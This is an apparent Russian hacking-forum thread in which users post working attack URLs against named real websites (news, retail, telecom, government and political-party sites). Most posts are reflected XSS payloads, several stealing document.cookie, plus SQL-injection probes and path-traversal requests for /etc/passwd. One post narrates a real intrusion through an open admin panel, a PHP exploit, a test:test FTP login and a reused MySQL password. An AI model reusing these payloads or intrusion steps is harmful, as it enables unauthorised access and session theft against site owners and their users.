Уязвимость, очень похожая на SQL-injection, нашел сегодня на сайте www.nix.ru (оф. партнер одной кампутерной правобережной фирмы)
или например такКод HTML:http://nix.ru/news/news_viewer.html?id=1%27
Код HTML:http://nix.ru/news/news_viewer.html?id=1+1
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
и еще только что нашел XSS багуСообщение от n0ns3ns3
Уязвимость, очень похожая на SQL-injection, нашел сегодня на сайте www.nix.ru (оф. партнер одной кампутерной правобережной фирмы)
или например такКод HTML:http://nix.ru/news/news_viewer.html?id=1%27
Код HTML:http://nix.ru/news/news_viewer.html?id=1+1
в общем виде:напримерКод HTML:http://nix.ru/support/request/check.php?serial_number=***91;XSS***93;
;)Код HTML:http://nix.ru/support/request/check.php?serial_number=%3Cscript%3Ealert(%27special%20for%20IST%20by%20***91;n0ns3ns3***93;%27)%3C/script%3E
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
сайт ТрансТелеКом-Байкал www.bttc.ru
= SQL-injКод HTML:http://www.bttc.ru/asp/news.asp?noparma=ziwk&mode=show&gid=191.%272
by nonS
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
сайт телекомпании БСТ www.bst.bratsk.ru
=XSSКод HTML:http://bst.bratsk.ru/search/?string=%22%3E%3Cscript%3Ealert("hi all from nonS")%3C/script%3E
сайт allbratsk.ru www.allbratsk.ru
=XSSКод HTML:http://allbratsk.ru/photo.php?gal=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
by nonS
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
дело было вечером, делать было нечего
сайт lenta.ru www.lenta.ru
=XSSКод HTML:http://lenta.ru/Search?Search=%22%3E%3CSCRIPT%3Ealert(%27hi%20all%20from%20nonS%20%)%27)%3C/SCRIPT%3E
мелочь, а приятно
by nonS
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Ozon.ru туда же
=XSSКод HTML:http://www.ozon.ru/?context=all_search_list&searchstring=%22%3E%3Cscript%3ealert(%22by%20Vanda%22);%3C/script%3E
/me пора лечицца :(
сайт телекомпании БСТ www.bst.bratsk.ru
=XSS + SQL-injКод HTML:http://bst.bratsk.ru/news/archive/?id=1908%22%3E%3Cscript%3Ealert(%22hi%20from%20nonS%22)%3C/script%3E
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
/me пора лечицца :(
сайт телекомпании БСТ www.bst.bratsk.ru
=XSS + SQL-injКод HTML:http://bst.bratsk.ru/news/archive/?id=1908%22%3E%3Cscript%3Ealert(%22hi%20from%20nonS%22)%3C/script%3E
Оффтопик
Всех люблю
Вот решил молодость вспомнить
Захотелось проверить так же Гугль функционален (в плане запросов), и вот результаты найденны за 20 минут:
Код HTML:http://www.pioneerlocal.com/cgi-bin/ppo-movierev?moviewhat=/../../../../../../../../../etc/passwdКод HTML:http://www.perlhelp.com/cgi-bin/perl-html.cgi?out=../../../../../../etc/passwd-------------------------------------------------------------------Код HTML:http://tinman.snell.clarkson.edu/~horn/bin2/showscripts2.cgi?showscripts2.cgi
Код HTML:http://money.dp.ua/test.php- это так для разведки сойдетКод HTML:http://www.ourdocuments.gov/content.php?page=../
Будет время еще че-нить накопаю
уууу... аська тоже в xss...
http://www.icq.com/boards/search_results.php?uSearchString=%3Cscript%3Ealert %28%27123%27%29%3B%3C%2Fscript%3E
ыыыы... рамблер...
==
http://www.rambler.ru/doc/feedback.shtml - вводим везде <script>alert('test')</script> и удивляемся как нынче не внимательны кодеры к xss
сайт вроде как Братской студии web дезигна www.stilia.ru
и нашел я там множественные XSS
пример:
http://www.stilia.ru/index.php?option=com_search&Itemid=5&searchword="> <script>alert(document.cookie)</script>
или
http://www.stilia.ru/index.php?option=com_glossary&Itemid=75"><script>a lert(document.cookie)</script>
общий вид:
http://www.stilia.ru/index.php?option=com_glossary&Itemid=ID">[XSS]
ID - любое ID раздела сайта
на сайте есть форум, так что сами думайте к чему это может привести
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
вчера была найдена xss на чате дикий остров...
после связи с администрацией чата (читай с данивчиком) ошибка была устранена
опять мне не спицца
банально, но XSS на сайте ЛДПР
http://www.ldpr.ru/search/?action=index&text=%27%3E%3Cscript%3Ealert(documen t.cookie);%3C/script%3E
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
всеми известный holm.ru
Код HTML:http://www.holm.ru/cgi-bin/hselect.cgi?user=%22%3E%3Cscript%3Ealert(%27hi%20from%20nons%27)%3C/script%3E
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
уф, на каждом втором сайте xss есть
вот нашел даже на www.cnews.ru -
и на www.ren-tv.com -Код HTML:http://www.cnews.ru/search.shtml?query=text&cat=&d1=01%22%3E%3Cscript%3Ealert(%27XSS%20founded%20by%20nons%27)%3C/script%3E&m1=01&y1=1998&d2=09&m2=04&y2=2006
Код HTML:http://www.ren-tv.com/search/index.php?terms=%22%3E%3Cscript%3Ealert(%22LOL%20=)%22)%3C/script%3E
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
по сути фигня, но XSS на офф. сайте города (%
Код HTML:http://www.bratsk-city.ru/index.php?newsid=%22%3E%3Cscript%3Ealert(%27by%20nons%27)%3C/script%3E
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
может кому-нибудь будет интересно./me пора лечицца :(
сайт телекомпании БСТ www.bst.bratsk.ru
=XSS + SQL-injКод HTML:http://bst.bratsk.ru/news/archive/?id=1908%22%3E%3Cscript%3Ealert(%22hi%20from%20nonS%22)%3C/script%3E
админы этого ресурса вообще сплоховали.
во-первых какое то время админка этого сайта была просто открыта и не запаролена. php был в safe-mode, с админки под видом анонса заливался скрипт использующий багу в пхп, который позволил побродить по файловой системе, и обнаружить ляп №2. а именно диру пользователя test в /home. после чего под логином test:test можно было законнектиться на фтп и использовать ляп №3, пользователь небыл в chroot'e (в отличии от юзера webmaster). с правами nobody слились исходники сайта, откуда был взят пассворд от мускуля, который как ни странно подошёл к пользователю webmaster (ляп №4)
в /etc/passwd фигурировали админы довольно опытные, странно что они допустили ряд таких элементарных ошибок.
ps: сорри за оффтоп.
многие достаточно опытные как правило на мелочах и прокалываются (%может кому-нибудь будет интересно.
админы этого ресурса вообще сплоховали.
во-первых какое то время админка этого сайта была просто открыта и не запаролена. php был в safe-mode, с админки под видом анонса заливался скрипт использующий багу в пхп, который позволил побродить по файловой системе, и обнаружить ляп №2. а именно диру пользователя test в /home. после чего под логином test:test можно было законнектиться на фтп и использовать ляп №3, пользователь небыл в chroot'e (в отличии от юзера webmaster). с правами nobody слились исходники сайта, откуда был взят пассворд от мускуля, который как ни странно подошёл к пользователю webmaster (ляп №4)
в /etc/passwd фигурировали админы довольно опытные, странно что они допустили ряд таких элементарных ошибок.
ps: сорри за оффтоп.
ЗЫ зачотно, пиши еще (;
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
нихрена сибе мелоч. Админка милости просим
Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)
Ваши права
Ответить с цитированием